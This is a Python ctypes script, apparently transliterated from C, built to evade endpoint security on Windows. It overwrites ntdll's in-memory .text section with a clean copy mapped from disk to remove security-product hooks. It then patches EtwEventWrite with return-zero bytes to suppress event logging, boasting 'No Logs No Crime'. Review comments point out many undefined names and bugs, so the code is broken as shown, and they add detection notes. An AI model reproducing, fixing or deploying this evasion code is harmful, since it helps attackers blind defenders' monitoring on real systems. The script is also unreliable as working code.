import ctypes
import sys
from ctypes import *
from ctypes.wintypes import *
def UnhookNTDLL(hNtdll, pMapping) -> int:
    """
    Overwrite the .text section of the loaded ntdll (hNtdll) with the .text
    section of a freshly mapped, unmodified copy of ntdll.dll (pMapping).

    The intent is to discard any inline hooks a security product placed in
    the in-process ntdll. Returns 0 after the first ".text" section has been
    copied, -1 when no ".text" section is found or when either VirtualProtect
    call leaves oldprotect at 0.

    NOTE(review): as written this function cannot execute. PIMAGE_DOS_HEADER,
    PIMAGE_NT_HEADERS, PIMAGE_SECTION_HEADER, IMAGE_FIRST_SECTION,
    IMAGE_SIZEOF_SECTION_HEADER, strcmp and PAGE_EXECUTE_READWRITE are not
    defined anywhere in this file and are not provided by ctypes or
    ctypes.wintypes, and VirtualProtect_p is a local variable of main(), not a
    module-level name. The whole block reads like a line-by-line port of the
    C original with its declarations left out.
    """
    oldprotect = DWORD(0)
    # DOS header -> NT headers via e_lfanew.
    # NOTE(review): DWORD is a 32-bit ctypes type, so DWORD(base) truncates a
    # 64-bit module address, and ctypes simple types do not support "+ int"
    # arithmetic at all; every address computation below needs plain ints.
    pidh = PIMAGE_DOS_HEADER(pMapping)
    pinh = PIMAGE_NT_HEADERS(DWORD(pMapping) + pidh.e_lfanew)
    # find .text section
    for i in range(pinh.FileHeader.NumberOfSections):
        pish = PIMAGE_SECTION_HEADER(DWORD(IMAGE_FIRST_SECTION(pinh)) + DWORD(IMAGE_SIZEOF_SECTION_HEADER) * i)
        # strcmp convention: 0 means equal, hence "not strcmp(...)" is the match.
        if not strcmp(c_char_p(pish.Name), b".text"):
            # prepare ntdll.dll memory region for write permissions.
            # Detection note: flipping ntdll's .text to RWX is itself a
            # high-signal event for endpoint telemetry, independent of the copy.
            VirtualProtect_p(LPVOID(DWORD(hNtdll) + pish.VirtualAddress), pish.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, byref(oldprotect))
            # NOTE(review): this inspects the out-parameter rather than the BOOL
            # return value; FuckEtw() below checks the return value and reports
            # GetLastError(). Be consistent and check the return value here too.
            if not oldprotect:
                # RWX failed!
                return -1
            # copy original .text section into ntdll memory
            memmove(LPVOID(DWORD(hNtdll) + pish.VirtualAddress), LPVOID(DWORD(pMapping) + pish.VirtualAddress), pish.Misc.VirtualSize)
            # restore original protection settings of ntdll
            VirtualProtect_p(LPVOID(DWORD(hNtdll) + pish.VirtualAddress), pish.Misc.VirtualSize, oldprotect, byref(oldprotect))
            if not oldprotect:
                # it failed
                return -1
            # Only the first ".text" section is processed; the loop never
            # continues past it.
            return 0
    # No section named ".text" was found.
    return -1
def FuckEtw() -> bool:
    """
    Patch the first bytes of ntdll!EtwEventWrite in the current process so the
    export returns 0 immediately, suppressing events emitted through it.

    Returns True on success; returns False, after printing GetLastError(),
    when VirtualProtect or FlushInstructionCache reports failure.

    NOTE(review): as written this cannot execute. GetProcAddress,
    GetModuleHandleA, memcpy, FlushInstructionCache, GetCurrentProcess and
    PAGE_EXECUTE_READWRITE are not defined in this file and not exported by
    ctypes/ctypes.wintypes (ctypes provides memmove, not memcpy), and
    VirtualProtect_p is a local of main(). Only the EtwEventWrite export is
    touched; nothing here establishes that other ETW entry points in the
    process are affected, so "no logs" is a claim to verify, not a given.
    An in-memory/on-disk comparison of ntdll's first bytes would expose this
    patch, and the preceding RWX transition is visible to endpoint telemetry.
    """
    oldprotect = DWORD(0)
    # NOTE(review): if GetProcAddress ends up bound through ctypes.windll with
    # no restype, its result is a c_int and a 64-bit address gets truncated;
    # set restype = c_void_p on the binding.
    pEventWrite = GetProcAddress(GetModuleHandleA(b"ntdll.dll"), b"EtwEventWrite")
    # 4096 bytes from the function start; VirtualProtect rounds this up to the
    # page(s) it touches, so it may span two pages. The patch itself is 4-5 bytes.
    if not VirtualProtect_p(pEventWrite, 4096, PAGE_EXECUTE_READWRITE, byref(oldprotect)):
        print("[!] VirtualProtect Failed With Error : %d" % GetLastError())
        return False
    # Select the stub by interpreter bitness (sys.maxsize > 2**32 on 64-bit
    # builds); the patch must match the bitness of the process it runs in.
    if sys.maxsize > 2**32:
        memcpy(pEventWrite, b"\x48\x33\xc0\xc3", 4) # xor rax, rax; ret
    else:
        # "ret 14" is ret 0x14: pops 20 bytes of stdcall arguments before
        # returning - confirm against the 32-bit EtwEventWrite signature.
        memcpy(pEventWrite, b"\x33\xc0\xc2\x14\x00", 5) # xor eax, eax; ret 14
    # Put the original protection back so the page is not left RWX.
    if not VirtualProtect_p(pEventWrite, 4096, oldprotect, byref(oldprotect)):
        print("[!] VirtualProtect Failed With Error : %d" % GetLastError())
        return False
    # Flush so no core keeps executing stale pre-patch instructions.
    if not FlushInstructionCache(GetCurrentProcess(), pEventWrite, 4096):
        print("[!] FlushInstructionCache Failed With Error : %d" % GetLastError())
        return False
    return True
def main() -> int:
    """
    Script entry point: map a clean ntdll.dll from disk, overwrite the
    in-process ntdll .text section with it (UnhookNTDLL), then, after the user
    presses Enter, patch EtwEventWrite (FuckEtw).

    Returns 0 on success, -1 when opening or mapping ntdll.dll fails, and
    EXIT_FAILURE when FuckEtw() fails. The caller at the bottom of the file
    discards this value.

    NOTE(review): this function references names that exist nowhere in the
    file: Banner, pLocalNtdll, XORcrypt, sNtdllPath, sNtdllPath_len, sNtdll,
    CreateFileA, CloseHandle, GetCurrentProcessId, GetModuleHandleA,
    GetProcAddress, EXIT_FAILURE and the Win32 constants GENERIC_READ,
    FILE_SHARE_READ, OPEN_EXISTING, INVALID_HANDLE_VALUE, PAGE_READONLY,
    SEC_IMAGE and FILE_MAP_READ. LPSECURITY_ATTRIBUTES does not appear to
    come from ctypes.wintypes either - verify. The XORcrypt/EXIT_FAILURE usage
    suggests the C source was transliterated without its declarations; the
    first statement, Banner(), already raises NameError.
    """
    Banner()
    ret = 0
    hFile = HANDLE(0)
    hFileMapping = HANDLE(0)
    pMapping = LPVOID(0)
    # Resolve kernel32 exports into typed function pointers. These are locals
    # of main(); UnhookNTDLL() and FuckEtw() nevertheless use VirtualProtect_p
    # as if it were module-level, which they cannot see.
    CreateFileMappingA_p = WINFUNCTYPE(HANDLE, HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR)(GetProcAddress(GetModuleHandleA(b"kernel32"), b"CreateFileMappingA"))
    MapViewOfFile_p = WINFUNCTYPE(LPVOID, HANDLE, DWORD, DWORD, DWORD, SIZE_T)(GetProcAddress(GetModuleHandleA(b"kernel32"), b"MapViewOfFile"))
    UnmapViewOfFile_p = WINFUNCTYPE(BOOL, LPCVOID)(GetProcAddress(GetModuleHandleA(b"kernel32"), b"UnmapViewOfFile"))
    VirtualProtect_p = WINFUNCTYPE(BOOL, LPVOID, SIZE_T, DWORD, PDWORD)(GetProcAddress(GetModuleHandleA(b"kernel32"), b"VirtualProtect"))
    # NOTE(review): "%p" is not a Python %-format specifier; this raises
    # ValueError even once pLocalNtdll exists. Use "0x%x" / hex().
    print("\n[i] Hooked Ntdll Base Address : 0x%p" % pLocalNtdll)
    # open ntdll.dll
    # NOTE(review): the path looks XOR-decoded in place using its own last
    # byte as the key (presumably to keep the string out of static scans);
    # neither the buffer nor XORcrypt is defined here.
    XORcrypt(sNtdllPath, sNtdllPath_len, sNtdllPath[sNtdllPath_len - 1])
    hFile = CreateFileA(sNtdllPath, GENERIC_READ, FILE_SHARE_READ, None, OPEN_EXISTING, 0, None)
    if hFile == INVALID_HANDLE_VALUE:
        # failed to open ntdll.dll
        return -1
    # prepare file mapping
    # SEC_IMAGE lays the file out by PE section, so section RVAs taken from
    # the mapping line up with the loaded module in UnhookNTDLL().
    hFileMapping = CreateFileMappingA_p(hFile, None, PAGE_READONLY | SEC_IMAGE, 0, 0, None)
    if not hFileMapping:
        # file mapping failed
        CloseHandle(hFile)
        return -1
    # map the bastard
    pMapping = MapViewOfFile_p(hFileMapping, FILE_MAP_READ, 0, 0, 0)
    if not pMapping:
        # mapping failed
        CloseHandle(hFileMapping)
        CloseHandle(hFile)
        return -1
    # remove hooks
    # NOTE(review): ret is assigned but never checked - a failed unhook (-1)
    # still falls through to the ETW patch and the success banner below.
    # GetModuleHandleA is given the full path here but b"ntdll.dll" in FuckEtw().
    ret = UnhookNTDLL(GetModuleHandleA(sNtdllPath), pMapping)
    # NOTE(review): same "%p" problem, and sNtdll is undefined.
    print("[i] Unhooked Ntdll Base Address: 0x%p" % sNtdll)
    # Clean up.
    # NOTE(review): no try/finally - an exception out of UnhookNTDLL() leaks
    # the view and both handles.
    UnmapViewOfFile_p(pMapping)
    CloseHandle(hFileMapping)
    CloseHandle(hFile)
    print("\n[+] PID Of The Current Proccess: [%d]\n" % GetCurrentProcessId())
    print("\n[#] Ready For ETW Patch.\n")
    print("[+] Press <Enter> To Patch ETW ...\n")
    # Interactive pause so the operator can inspect the process before the patch.
    input()
    if not FuckEtw():
        return EXIT_FAILURE
    print("\n[+] ETW Patched, No Logs No Crime ! \n")
    print("\n")
    return 0
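if __name__ == "__main__":
    # Propagate main()'s status (0 / -1 / EXIT_FAILURE) as the process exit
    # code; previously a failed open/map/patch still exited 0 on return.
    sys.exit(main())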